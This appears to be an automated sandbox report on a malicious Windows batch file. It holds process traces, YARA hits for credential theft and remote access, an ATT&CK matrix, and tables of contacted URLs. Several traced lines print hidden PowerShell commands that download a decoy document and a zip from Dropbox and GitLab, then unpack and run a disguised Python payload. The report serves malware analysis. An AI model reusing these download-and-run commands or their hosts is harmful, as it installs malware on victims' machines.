              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5124
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4758
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4886
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2431
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4546
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5161
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2084
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2023
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 962
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916, Thread sleep count: 5124 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700, Thread sleep count: 4758 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 992, Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428, Thread sleep count: 4886 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428, Thread sleep count: 2431 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852, Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748, Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892, Thread sleep count: 4546 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976, Thread sleep count: 5276 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800, Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576, Thread sleep count: 5161 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812, Thread sleep count: 2084 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428, Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4896, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292, Thread sleep count: 2023 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068, Thread sleep count: 962 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268, Thread sleep time: -1844674407370954s >= -30000s
              Source: powershell.exe, 0000000E.00000002.2326723218.00000254F1785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
              Source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_5896.amsi.csv, type: OTHER
              Source: Yara match | File source: amsi64_1584.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1584, type: MEMORYSTR
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe fINd
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'c:\users\user\appdata\local\temp\\12_advertising_campaign_and_collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip', 'c:\users\public\document.zip')"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

              Stealing of Sensitive Information

              Source: Yara match | File source: amsi64_5048.amsi.csv, type: OTHER

              Remote Access Functionality

              Source: Yara match | File source: amsi64_5048.amsi.csv, type: OTHER
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              11
              Scripting
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture4
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Source | Detection | Scanner | Label | Link
              hnl2bose13.bat | 3% | ReversingLabs | - | -
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://a.sprig.com/ | 0% | Avira URL Cloud | safe | -
              http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe | -
              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViG | 0% | Avira URL Cloud | safe | -
              https://gitlab.com( | 0% | Avira URL Cloud | safe | -
              https://instructorledlearning.dropboxbusiness.com/ | 100% | Avira URL Cloud | phishing | -
              https://www.hellofax.com/ | 0% | Avira URL Cloud | safe | -
              https://sales.dropboxbusiness.com/ | 0% | Avira URL Cloud | safe | -
              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe | -
              https://officeapps-df.live.com | 0% | Avira URL Cloud | safe | -
              https://navi.dropbox.jp/ | 0% | Avira URL Cloud | safe | -
              https://docs.sandbox.google.com/document/fsip/ | 0% | Avira URL Cloud | safe | -
              https://docs.sandbox.google.com/spreadsheets/fsip/ | 0% | Avira URL Cloud | safe | -
              https://selfguidedlearning.dropboxbusiness.com/ | 0% | Avira URL Cloud | safe | -
              https://docs.sandbox.google.com/presentation/fsip/ | 0% | Avira URL Cloud | safe | -
              https://app.hellofax.com/ | 0% | Avira URL Cloud | safe | -
              https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ | 0% | Avira URL Cloud | safe | -
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              edge-block-www-env.dropbox-dns.com | 162.125.66.15 | true | false | - | high
              gitlab.com | 172.65.251.78 | true | false | - | high
              www-env.dropbox-dns.com | 162.125.66.18 | true | false | - | high
              ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | unknown | unknown | false | - | unknown
              www.dropbox.com | unknown | unknown | false | - | high
              Name | Malicious | Antivirus Detection | Reputation
              https://gitlab.com/users/sign_in | false | - | high
              https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip | false | - | high
              https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 | false | - | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://gitlab.com | powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.dropbox.com/service_worker.js | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://gitlab.com/-/sandbox/; | powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://paper.dropbox.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.hellofax.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://pal-test.adyen.com | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.dropbox.com | powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://paper.dropbox.com/cloud-docs/edit | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://contoso.com/License | powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://snowplow.trx.gitlab.net | powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://app.hellosign.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://collector.prd-278964.gl-product-analytics.com | powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.hellosign.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://instructorledlearning.dropboxbusiness.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
              https://www.dropbox.com/page_success/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://gitlab.com | powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB12000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.dropbox.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.dropbox.com/pithos/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | powershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://sales.dropboxbusiness.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://photos.dropbox.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://a.sprig.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.docsend.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.dropbox.com/encrypted_folder_download/service_worker.js | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false
                                                                    high
                                                                    https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://contoso.com/powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://apis.google.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zippowershell.exe, 0000000E.00000002.2326636099.00000254F1690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViGpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://login.yahoo.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://docsend.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://gitlab.com(powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
